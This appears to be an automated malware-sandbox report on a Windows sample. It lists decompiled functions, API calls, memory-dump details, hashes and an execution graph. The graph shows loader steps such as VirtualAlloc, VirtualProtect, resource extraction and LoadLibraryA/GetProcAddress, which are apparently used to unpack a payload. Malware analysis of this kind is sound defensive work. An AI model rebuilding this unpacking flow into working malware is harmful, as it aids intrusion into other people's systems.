                                                                                                                                                                                                          0x00864855
                                                                                                                                                                                                          0x00864855
                                                                                                                                                                                                          0x00864857
                                                                                                                                                                                                          0x00864858
                                                                                                                                                                                                          0x00864860
                                                                                                                                                                                                          0x00864865
                                                                                                                                                                                                          0x0086486a
                                                                                                                                                                                                          0x0086486f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00864876
                                                                                                                                                                                                          0x00864831
                                                                                                                                                                                                          0x00864841
                                                                                                                                                                                                          0x00864847
                                                                                                                                                                                                          0x0086480b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086480b
                                                                                                                                                                                                          0x008647f6
                                                                                                                                                                                                          0x00864806
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00864E6F), ref: 008647EA
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00864823
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00864847
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00864851
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                          • API String ID: 359063898-2312194364
                                                                                                                                                                                                          • Opcode ID: 6012e1ffe8dd33cd8dbacd297f0e1295861e268d20146964d3e3e6ccbd65ee6c
                                                                                                                                                                                                          • Instruction ID: 5ec3393b69feab89f55a70ede8d1b9e36c4bba60f0a9fc0e23921ad7a889ebfa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6012e1ffe8dd33cd8dbacd297f0e1295861e268d20146964d3e3e6ccbd65ee6c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11112CB5204641AFD7199F249C18F7A375AF7C5304F169529FA82DB341DE768C068760
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00863680(void* __ecx) {
                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                          				struct tagMSG _v36;
                                                                                                                                                                                                          				int _t8;
                                                                                                                                                                                                          				struct HWND__* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_v8 = __ecx;
                                                                                                                                                                                                          				_t16 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                          					if(_t8 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							if(_v36.message != 0x12) {
                                                                                                                                                                                                          								DispatchMessageA( &_v36);
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t16 = 1;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                          						} while (_t8 != 0);
                                                                                                                                                                                                          						if(_t16 == 0) {
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t8;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x0086368c
                                                                                                                                                                                                          0x0086368f
                                                                                                                                                                                                          0x00863691
                                                                                                                                                                                                          0x0086369f
                                                                                                                                                                                                          0x008636a7
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008636ba
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008636bc
                                                                                                                                                                                                          0x008636bc
                                                                                                                                                                                                          0x008636c0
                                                                                                                                                                                                          0x008636cb
                                                                                                                                                                                                          0x008636c2
                                                                                                                                                                                                          0x008636c4
                                                                                                                                                                                                          0x008636c4
                                                                                                                                                                                                          0x008636da
                                                                                                                                                                                                          0x008636e0
                                                                                                                                                                                                          0x008636e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008636e6
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008636ba
                                                                                                                                                                                                          0x008636ed

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0086369F
                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636B2
                                                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 008636CB
                                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 008636DA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2776232527-0
                                                                                                                                                                                                          • Opcode ID: 9ee9e9da2b29fa39819354544270d94e5e705c720c86664d0b8001045f94599d
                                                                                                                                                                                                          • Instruction ID: 0c96479caee7207d799ff736cc022f23748f7fdd16b3fcd480690baeb5cedc75
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee9e9da2b29fa39819354544270d94e5e705c720c86664d0b8001045f94599d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801A77290021577DF304BA69C48FEB76BCFBD6B10F010119F906F2180D5A0C640DA60
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                                          			E00866517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                          				struct HRSRC__* _t6;
                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                          				struct HINSTANCE__* _t23;
                                                                                                                                                                                                          				int _t24;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t23 =  *0x869a3c; // 0x860000
                                                                                                                                                                                                          				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                          				if(_t6 == 0) {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					E008644B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					_t24 = _a16;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                          					if(_t21 == 0) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						if(_a12 != 0) {
                                                                                                                                                                                                          							_push(_a12);
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_push(0);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                          						FreeResource(_t21);
                                                                                                                                                                                                          						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				return _t24;
                                                                                                                                                                                                          			}







                                                                                                                                                                                                          0x0086651f
                                                                                                                                                                                                          0x0086652a
                                                                                                                                                                                                          0x00866534
                                                                                                                                                                                                          0x0086656b
                                                                                                                                                                                                          0x00866577
                                                                                                                                                                                                          0x0086657c
                                                                                                                                                                                                          0x00866536
                                                                                                                                                                                                          0x0086653e
                                                                                                                                                                                                          0x00866542
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866544
                                                                                                                                                                                                          0x00866547
                                                                                                                                                                                                          0x0086654c
                                                                                                                                                                                                          0x00866549
                                                                                                                                                                                                          0x00866549
                                                                                                                                                                                                          0x00866549
                                                                                                                                                                                                          0x0086655e
                                                                                                                                                                                                          0x00866560
                                                                                                                                                                                                          0x00866569
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866569
                                                                                                                                                                                                          0x00866542
                                                                                                                                                                                                          0x00866587

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                          • LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                          • DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                          • FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1214682469-0
                                                                                                                                                                                                          • Opcode ID: aee6d7921ebd3e243c39da60e9b70faff040f8d16f1079c8a8564b32979f29ad
                                                                                                                                                                                                          • Instruction ID: 5b372a917426e16ee846c087e8b0b68ad767b16f4235c2ffc1d9cd386c551342
                                                                                                                                                                                                          • Opcode Fuzzy Hash: aee6d7921ebd3e243c39da60e9b70faff040f8d16f1079c8a8564b32979f29ad
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6901D672100659BBDB106FA99C4DDBB7A6DFF85761F020125FE16E3190EBB18D208AA1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                                          			E008665E8(char* __ecx) {
                                                                                                                                                                                                          				char _t3;
                                                                                                                                                                                                          				char _t10;
                                                                                                                                                                                                          				char* _t12;
                                                                                                                                                                                                          				char* _t14;
                                                                                                                                                                                                          				char* _t15;
                                                                                                                                                                                                          				CHAR* _t16;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t12 = __ecx;
                                                                                                                                                                                                          				_t15 = __ecx;
                                                                                                                                                                                                          				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                          				_t10 = 0;
                                                                                                                                                                                                          				do {
                                                                                                                                                                                                          					_t3 =  *_t12;
                                                                                                                                                                                                          					_t12 =  &(_t12[1]);
                                                                                                                                                                                                          				} while (_t3 != 0);
                                                                                                                                                                                                          				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                          					if(_t16 <= _t15) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if( *_t16 == 0x5c) {
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                          							_t16 = CharNextA(_t16);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *_t16 = _t10;
                                                                                                                                                                                                          						_t10 = 1;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_push(_t16);
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L11:
                                                                                                                                                                                                          					return _t10;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if( *_t16 == 0x5c) {
                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				goto L11;
                                                                                                                                                                                                          			}









                                                                                                                                                                                                          0x008665e8
                                                                                                                                                                                                          0x008665ed
                                                                                                                                                                                                          0x008665ef
                                                                                                                                                                                                          0x008665f2
                                                                                                                                                                                                          0x008665f4
                                                                                                                                                                                                          0x008665f4
                                                                                                                                                                                                          0x008665f6
                                                                                                                                                                                                          0x008665f7
                                                                                                                                                                                                          0x00866608
                                                                                                                                                                                                          0x00866611
                                                                                                                                                                                                          0x00866618
                                                                                                                                                                                                          0x0086661c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086660e
                                                                                                                                                                                                          0x00866623
                                                                                                                                                                                                          0x00866625
                                                                                                                                                                                                          0x0086663b
                                                                                                                                                                                                          0x0086663b
                                                                                                                                                                                                          0x0086663d
                                                                                                                                                                                                          0x00866641
                                                                                                                                                                                                          0x00866610
                                                                                                                                                                                                          0x00866610
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00866610
                                                                                                                                                                                                          0x00866644
                                                                                                                                                                                                          0x00866647
                                                                                                                                                                                                          0x00866647
                                                                                                                                                                                                          0x00866621
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00862B33), ref: 00866602
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00866612
                                                                                                                                                                                                          • CharPrevA.USER32(?,00000000), ref: 00866629
                                                                                                                                                                                                          • CharNextA.USER32(00000000), ref: 00866635
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Prev$Next
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3260447230-0
                                                                                                                                                                                                          • Opcode ID: 9a147a3404f40a2b90a75cb78ea653bf6b5876a97d21d76e2a4a73fa73e323e4
                                                                                                                                                                                                          • Instruction ID: d7e2f7c9b4198e70c7bad6ba755343c90b6180faa23777f6244272dfc694da37
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a147a3404f40a2b90a75cb78ea653bf6b5876a97d21d76e2a4a73fa73e323e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DF02D310041D06ED7361B28FC888B7BF9CFFA7354B1B016FE492E2001F6550D068A61
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E008669B0() {
                                                                                                                                                                                                          				intOrPtr* _t4;
                                                                                                                                                                                                          				intOrPtr* _t5;
                                                                                                                                                                                                          				void* _t6;
                                                                                                                                                                                                          				intOrPtr _t11;
                                                                                                                                                                                                          				intOrPtr _t12;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				 *0x8681f8 = E00866C70();
                                                                                                                                                                                                          				__set_app_type(E00866FBE(2));
                                                                                                                                                                                                          				 *0x8688a4 =  *0x8688a4 | 0xffffffff;
                                                                                                                                                                                                          				 *0x8688a8 =  *0x8688a8 | 0xffffffff;
                                                                                                                                                                                                          				_t4 = __p__fmode();
                                                                                                                                                                                                          				_t11 =  *0x868528; // 0x0
                                                                                                                                                                                                          				 *_t4 = _t11;
                                                                                                                                                                                                          				_t5 = __p__commode();
                                                                                                                                                                                                          				_t12 =  *0x86851c; // 0x0
                                                                                                                                                                                                          				 *_t5 = _t12;
                                                                                                                                                                                                          				_t6 = E00867000();
                                                                                                                                                                                                          				if( *0x868000 == 0) {
                                                                                                                                                                                                          					__setusermatherr(E00867000);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				E008671EF(_t6);
                                                                                                                                                                                                          				return 0;
                                                                                                                                                                                                          			}








                                                                                                                                                                                                          0x008669b7
                                                                                                                                                                                                          0x008669c2
                                                                                                                                                                                                          0x008669c8
                                                                                                                                                                                                          0x008669cf
                                                                                                                                                                                                          0x008669d8
                                                                                                                                                                                                          0x008669de
                                                                                                                                                                                                          0x008669e4
                                                                                                                                                                                                          0x008669e6
                                                                                                                                                                                                          0x008669ec
                                                                                                                                                                                                          0x008669f2
                                                                                                                                                                                                          0x008669f4
                                                                                                                                                                                                          0x00866a00
                                                                                                                                                                                                          0x00866a07
                                                                                                                                                                                                          0x00866a0d
                                                                                                                                                                                                          0x00866a0e
                                                                                                                                                                                                          0x00866a15

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00866FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00866FC5
                                                                                                                                                                                                          • __set_app_type.MSVCRT ref: 008669C2
                                                                                                                                                                                                          • __p__fmode.MSVCRT ref: 008669D8
                                                                                                                                                                                                          • __p__commode.MSVCRT ref: 008669E6
                                                                                                                                                                                                          • __setusermatherr.MSVCRT ref: 00866A07
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1632413811-0
                                                                                                                                                                                                          • Opcode ID: 6e2e5638f6878289bdee13d79f170e9502ed5ee2d7e859952b650e678df55625
                                                                                                                                                                                                          • Instruction ID: c44dfd93919d2b26821290ec8389240bd5b65fb7dd122a9c928e440e5932e232
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e2e5638f6878289bdee13d79f170e9502ed5ee2d7e859952b650e678df55625
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF0F870188741CFC718AF34ED1E6043BA1FB05335B132719E466D63E0DFBA85508E12
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                          Execution Coverage:2.7%
                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:28%
                                                                                                                                                                                                          Signature Coverage:14.7%
                                                                                                                                                                                                          Total number of Nodes:339
                                                                                                                                                                                                          Total number of Limit Nodes:38
                                                                                                                                                                                                          execution_graph 29545 2cb092b GetPEB 29546 2cb0972 29545->29546 29547 3050490 29550 30504b1 29547->29550 29548 30506b6 29549 305068e LdrInitializeThunk 29549->29550 29550->29548 29550->29549 29551 2cb003c 29552 2cb0049 29551->29552 29566 2cb0e0f SetErrorMode SetErrorMode 29552->29566 29557 2cb0265 29558 2cb02ce VirtualProtect 29557->29558 29560 2cb030b 29558->29560 29559 2cb0439 VirtualFree 29561 2cb04be 29559->29561 29565 2cb05f4 LoadLibraryA 29559->29565 29560->29559 29562 2cb04e3 LoadLibraryA 29561->29562 29561->29565 29562->29561 29564 2cb08c7 29565->29564 29567 2cb0223 29566->29567 29568 2cb0d90 29567->29568 29569 2cb0dad 29568->29569 29570 2cb0dbb GetPEB 29569->29570 29571 2cb0238 VirtualAlloc 29569->29571 29570->29571 29571->29557 29572 2cb0920 TerminateProcess 29573 40cbdd 29574 40cbe9 __fcloseall 29573->29574 29608 40d534 HeapCreate 29574->29608 29577 40cc46 29610 41087e GetModuleHandleW 29577->29610 29581 40cc57 __RTC_Initialize 29644 411a15 29581->29644 29584 40cc66 29585 40cc72 GetCommandLineA 29584->29585 29775 40e79a 63 API calls 3 library calls 29584->29775 29659 412892 29585->29659 29589 40cc71 29589->29585 29592 40cc97 29695 41255f 29592->29695 29596 40cca8 29710 40e859 29596->29710 29599 40ccb0 29600 40ccbb 29599->29600 29778 40e79a 63 API calls 3 library calls 29599->29778 29716 4019f0 OleInitialize 29600->29716 29603 40ccd8 29604 40ccea 29603->29604 29770 40ea0a 29603->29770 29779 40ea36 63 API calls _doexit 29604->29779 29607 40ccef __fcloseall 29609 40cc3a 29608->29609 29609->29577 29773 40cbb4 63 API calls 3 library calls 29609->29773 29611 410892 29610->29611 29612 410899 29610->29612 29780 40e76a Sleep GetModuleHandleW 29611->29780 29614 410a01 29612->29614 29615 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 29612->29615 29802 410598 7 API calls __decode_pointer 29614->29802 29617 4108ec TlsAlloc 29615->29617 29616 410898 29616->29612 29620 40cc4c 29617->29620 29621 41093a TlsSetValue 29617->29621 29620->29581 29774 40cbb4 63 API calls 3 library calls 29620->29774 29621->29620 29622 41094b 29621->29622 29781 40ea54 6 API calls 4 library calls 29622->29781 29624 410950 29782 41046e TlsGetValue 29624->29782 29627 41046e __encode_pointer 6 API calls 29628 41096b 29627->29628 29629 41046e __encode_pointer 6 API calls 29628->29629 29630 41097b 29629->29630 29631 41046e __encode_pointer 6 API calls 29630->29631 29632 41098b 29631->29632 29792 40d564 InitializeCriticalSectionAndSpinCount __getstream 29632->29792 29634 410998 29634->29614 29793 4104e9 6 API calls __crt_waiting_on_module_handle 29634->29793 29636 4109ac 29636->29614 29794 411cba 29636->29794 29640 4109df 29640->29614 29641 4109e6 29640->29641 29801 4105d5 63 API calls 5 library calls 29641->29801 29643 4109ee GetCurrentThreadId 29643->29620 29831 40e1d8 29644->29831 29646 411a21 GetStartupInfoA 29647 411cba __calloc_crt 63 API calls 29646->29647 29649 411a42 29647->29649 29648 411c60 __fcloseall 29648->29584 29649->29648 29652 411cba __calloc_crt 63 API calls 29649->29652 29657 411ba7 29649->29657 29658 411b2a 29649->29658 29650 411bdd GetStdHandle 29650->29657 29651 411c42 SetHandleCount 29651->29648 29652->29649 29653 411bef GetFileType 29653->29657 29654 411b53 GetFileType 29654->29658 29657->29648 29657->29650 29657->29651 29657->29653 29833 41389c InitializeCriticalSectionAndSpinCount __fcloseall 29657->29833 29658->29648 29658->29654 29658->29657 29832 41389c InitializeCriticalSectionAndSpinCount __fcloseall 29658->29832 29660 4128b0 GetEnvironmentStringsW 29659->29660 29663 4128cf 29659->29663 29661 4128c4 GetLastError 29660->29661 29662 4128b8 29660->29662 29661->29663 29664 4128eb GetEnvironmentStringsW 29662->29664 29665 4128fa WideCharToMultiByte 29662->29665 29663->29662 29667 412968 29663->29667 29664->29665 29668 40cc82 29664->29668 29671 41295d FreeEnvironmentStringsW 29665->29671 29672 41292e 29665->29672 29666 412971 GetEnvironmentStrings 29666->29668 29669 412981 29666->29669 29667->29666 29667->29668 29684 4127d7 29668->29684 29673 411c75 __malloc_crt 63 API calls 29669->29673 29671->29668 29834 411c75 29672->29834 29675 41299b 29673->29675 29677 4129a2 FreeEnvironmentStringsA 29675->29677 29678 4129ae _realloc 29675->29678 29677->29668 29682 4129b8 FreeEnvironmentStringsA 29678->29682 29679 41293c WideCharToMultiByte 29680 412956 29679->29680 29681 41294e 29679->29681 29680->29671 29840 40b6b5 63 API calls 2 library calls 29681->29840 29682->29668 29685 4127f1 GetModuleFileNameA 29684->29685 29686 4127ec 29684->29686 29688 412818 29685->29688 29880 41446b 107 API calls __setmbcp 29686->29880 29874 41263d 29688->29874 29690 40cc8c 29690->29592 29776 40e79a 63 API calls 3 library calls 29690->29776 29692 411c75 __malloc_crt 63 API calls 29693 41285a 29692->29693 29693->29690 29694 41263d _parse_cmdline 73 API calls 29693->29694 29694->29690 29696 412568 29695->29696 29699 41256d _strlen 29695->29699 29882 41446b 107 API calls __setmbcp 29696->29882 29698 40cc9d 29698->29596 29777 40e79a 63 API calls 3 library calls 29698->29777 29699->29698 29700 411cba __calloc_crt 63 API calls 29699->29700 29705 4125a2 _strlen 29700->29705 29701 412600 29885 40b6b5 63 API calls 2 library calls 29701->29885 29703 411cba __calloc_crt 63 API calls 29703->29705 29704 412626 29886 40b6b5 63 API calls 2 library calls 29704->29886 29705->29698 29705->29701 29705->29703 29705->29704 29708 4125e7 29705->29708 29883 40ef42 63 API calls __set_error_mode 29705->29883 29708->29705 29884 40e61c 10 API calls 3 library calls 29708->29884 29712 40e867 __IsNonwritableInCurrentImage 29710->29712 29887 413586 29712->29887 29713 40e885 __initterm_e 29715 40e8a4 __IsNonwritableInCurrentImage __initterm 29713->29715 29891 40d2bd 74 API calls __cinit 29713->29891 29715->29599 29717 401ab9 29716->29717 29892 40b99e 29717->29892 29719 401abf 29720 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 29719->29720 29750 402467 29719->29750 29721 401dc3 FindCloseChangeNotification GetModuleHandleA 29720->29721 29728 401c55 29720->29728 29905 401650 29721->29905 29723 401e8b FindResourceA LoadResource LockResource SizeofResource 29724 40b84d _malloc 63 API calls 29723->29724 29725 401ebf 29724->29725 29907 40af66 29725->29907 29727 401c9c CloseHandle 29727->29603 29728->29727 29733 401cf9 Module32Next 29728->29733 29729 401ecb _memset 29730 401efc SizeofResource 29729->29730 29731 401f1c 29730->29731 29732 401f5f 29730->29732 29731->29732 29945 401560 __VEC_memcpy ___sbh_free_block 29731->29945 29734 401f92 _memset 29732->29734 29946 401560 __VEC_memcpy ___sbh_free_block 29732->29946 29733->29721 29744 401d0f 29733->29744 29737 401fa2 FreeResource 29734->29737 29738 40b84d _malloc 63 API calls 29737->29738 29739 401fbb SizeofResource 29738->29739 29740 401fe5 _memset 29739->29740 29741 4020aa LoadLibraryA 29740->29741 29742 401650 29741->29742 29743 40216c GetProcAddress 29742->29743 29746 4021aa 29743->29746 29743->29750 29744->29727 29745 401dad Module32Next 29744->29745 29745->29721 29745->29744 29746->29750 29919 4018f0 29746->29919 29748 40243f 29748->29750 29947 40b6b5 63 API calls 2 library calls 29748->29947 29750->29603 29751 4021f1 29751->29748 29931 401870 29751->29931 29753 402269 VariantInit 29754 401870 76 API calls 29753->29754 